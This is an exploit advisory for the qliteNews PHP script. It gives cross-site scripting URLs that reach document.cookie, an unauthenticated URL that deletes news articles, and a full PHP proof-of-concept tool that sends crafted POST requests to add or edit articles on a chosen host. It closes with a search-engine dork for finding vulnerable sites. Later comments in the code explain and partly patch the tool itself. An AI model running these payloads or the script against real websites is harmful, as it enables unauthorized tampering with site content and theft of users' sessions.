29/07/2005 23.25.51

qliteNews arbitrary database manipulation & cross site scripting poc exploit

software:
author site:
http://www.r2xdesign.net/page-phpscripts.php

xss:
http://[target]/[path]/admin/modifynews.php?id="><script>alert(document.cookie)</script>
http://[target]/[path]/admin/newsprocess.php?action=<script>alert(document.cookie)</script>

a user can access the /admin/newsprocess.php script directly to delete news from the database:
http://[target]/[path]/admin/newsprocess.php?action=del&id=1

The $id variable is the article number, so this request deletes the first news article on the site.

A POST request can also be used to submit or edit news:
this is my exploit code to submit news:

<?php

//***  http://www.rgod.altervista.org
//make these changes in php.ini if you have trouble
//with this script
//
//allow_call_time_pass_reference = on
//register_globals = On



// Silence every warning and notice. This also hides the failure modes of
// the code below (undefined request variables, a failed socket connect),
// so on a PHP without register_globals the tool misbehaves silently.
error_reporting(0);
// Emit the operator-facing form. The field names (host, mypath, port,
// author, title, news, id) are later read as bare variables, which only
// works with register_globals=On (see the header comment); that setting was
// removed in PHP 5.4, after which these variables are simply undefined.
// The form action interpolates $PHP_SELF unescaped into an attribute, so a
// crafted request URI to this page is reflected into the markup — a
// reflected-XSS bug in the tool itself. A fixed action, or
// htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES), would close it.
echo '<head><title>qlite news arbitrary database manipulation poc exploit</title>
      <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
      <style type="text/css">
      <!--
      body,td,th {color: #00FF00;}
      body {background-color: #000000;}
      .Stile5 {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; }
      .Stile6 {font-family: Verdana, Arial, Helvetica, sans-serif;
	       font-weight: bold;
	       font-style: italic;
              }
      -->
      </style></head>
      <body>
<p class="Stile6">qlite news arbitrary database manipulation poc exploit</p>
<p class="Stile6">a script by rgod at <a href="http://rgod.altervista.org" target="_blank">http://rgod.altervista.org</a></p>
<table width="84%" >
  <tr>
    <td width="43%">
     <form name="form1" method="post" action="'.$PHP_SELF.'?mypath=value&host=value&port=value&author=value&title=value&news=value&id=value">
      <p>
       <input type="text" name="host">
      <span class="Stile5">hostname (ex: www.sitename.com) </span></p>
      <p>
        <input type="text" name="mypath">
        <span class="Stile5">path (ex: /qlite/admin/ or /admin/ or just /) </span></p>
      <p>
      <input type="text" name="port">
        <span class="Stile5">specify a port other than 80 (default value) </span></p>
      <p>
      <input type="text" name="author">
        <span class="Stile5">author</span></p>
      <p>
      <input type="text" name="title">
        <span class="Stile5">title</span></p>
      <p>
      <input type="text" name="news">
        <span class="Stile5">news</span></p>
      <p>
      <input type="text" name="id">
        <span class="Stile5">article id (a number...)</span></p>
      <p>
          <input type="submit" name="Submit" value="go!">
      </p>
    </form></td>
  </tr>
</table>
</body>
</html>';

// The submitted values are echoed straight back without escaping — the same
// reflected-input problem as $PHP_SELF above.
echo $mypath.'<br>';
echo $host.'<br>';

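/**
 * Echo an HTML hex dump of $headeri: one table row per 16 bytes, the bytes
 * as two-digit hex, a spacer cell, then the same bytes as text. Used to
 * display the raw request and the raw response.
 *
 * Fixes versus the previous version: the text column no longer reads one
 * byte past the end of the string (an out-of-range string offset warns in
 * PHP and yields ""), a short final row is padded to the full width so the
 * text column lines up, the spacer entity is a well-formed `&nbsp;`, and
 * every byte is HTML-escaped before it is echoed — the response body comes
 * from the remote host, so echoing it raw lets that host inject markup into
 * the page this tool renders. Bytes outside printable ASCII are shown as '.'.
 * An empty string produces an empty table.
 *
 * @param string $headeri bytes to dump (binary-safe; only strlen/substr are used)
 * @return void output is written with echo
 */
function show($headeri)
{
    $bytesPerRow = 16;
    $total = strlen($headeri);
    echo '<table border="0">';
    for ($offset = 0; $offset < $total; $offset += $bytesPerRow) {
        $chunk = substr($headeri, $offset, $bytesPerRow);
        $chunkLen = strlen($chunk);
        echo '<tr>';
        // Hex column: %02x gives the leading zero the original added by hand.
        for ($i = 0; $i < $chunkLen; $i++) {
            echo '<td>' . sprintf('%02x', ord($chunk[$i])) . '</td>';
        }
        // Pad a short final row so the text column starts in the same place.
        for ($i = $chunkLen; $i < $bytesPerRow; $i++) {
            echo '<td>&nbsp;&nbsp;</td>';
        }
        echo '<td>&nbsp;&nbsp;</td>';
        // Text column: non-printable bytes become '.', printable ones are
        // escaped so remote-supplied '<', '>', '&' cannot become markup.
        for ($i = 0; $i < $chunkLen; $i++) {
            $byte = ord($chunk[$i]);
            $printable = ($byte >= 0x20 && $byte <= 0x7e) ? $chunk[$i] : '.';
            echo '<td>' . htmlspecialchars($printable, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</td>';
        }
        echo '</tr>';
    }
    echo '</table>';
}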

// Echoed back unescaped, like $mypath and $host above.
echo $port.'<br>';

// Only send when the operator filled in both host and path. `<>` is the
// loose inequality operator (same as !=), so a whitespace-only value passes.
if (($mypath<>'') and ($host<>''))
{
// Default to port 80 when the field was left blank.
if ($port=='') {$port=80;}

// Form body for newsprocess.php. author/title/news are URL-encoded; $id is
// not, so a non-numeric id would break the body. The client itself supplies
// the date and ip fields — presumably the server stores them as sent rather
// than deriving them; the fix on the server side is to set both itself.
$data="author=".urlencode($author)."&title=".urlencode($title)."&news=".urlencode($news)."&date=now&ip=kiss+me";
$data.="&id=".$id."&action=post&submit_news=1\r\n\r\n";

// Hand-built HTTP/1.1 POST. The "\r\n\r\n" appended to $data above is counted
// in Content-Length, so the body is four bytes longer than the form fields.
// "Connection: Close" matters because the read loop below runs until EOF.
// Accept-Encoding advertises gzip/deflate, so a server that honours it sends
// a compressed body, which the dump below shows as binary.
$packet ="POST ".$mypath."newsprocess.php HTTP/1.1\r\n";
$packet.="Accept: */*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: LOLLLLLL!\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Cache-Control: no-cache\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;


echo '<br> Sending exploit to '.$host.'<br>';
show($packet);
// The return value is never checked: on a failed connect $fp is false and,
// with error_reporting(0) set above, fputs()/feof() fail silently (PHP 8
// throws a TypeError for a non-resource instead).
$fp=fsockopen(gethostbyname($host),$port);
fputs($fp,$packet);  
// Read the whole response (status line, headers and body) until the server
// closes the connection.
$data='';
while (!feof($fp))
{
$data.=fgets($fp);
}
fclose($fp);
// eregi() was deprecated in PHP 5.3 and removed in 7.0; the equivalent is
// preg_match('/HTTP\/1\.1 200 OK/i', $data). A 200 status only shows the
// request was accepted, not that a record was written — the response body
// has to be inspected for that.
if (eregi('HTTP/1.1 200 OK',$data))
    {echo 'Exploit sent...<br> if qlite is unpatched and vulnerable <br>';
     echo 'you will see a new news article ;) ...';
    }
else
    {echo 'Error, see packet dump...';}
// Dump the raw response. This is remote-controlled data, so show() has to
// escape it before rendering.
show($data);
}

?>

googledork: "Powered by qliteNews" 

rgod
email: retrogod at aliceposta.it
site: http://rgod.altervista.org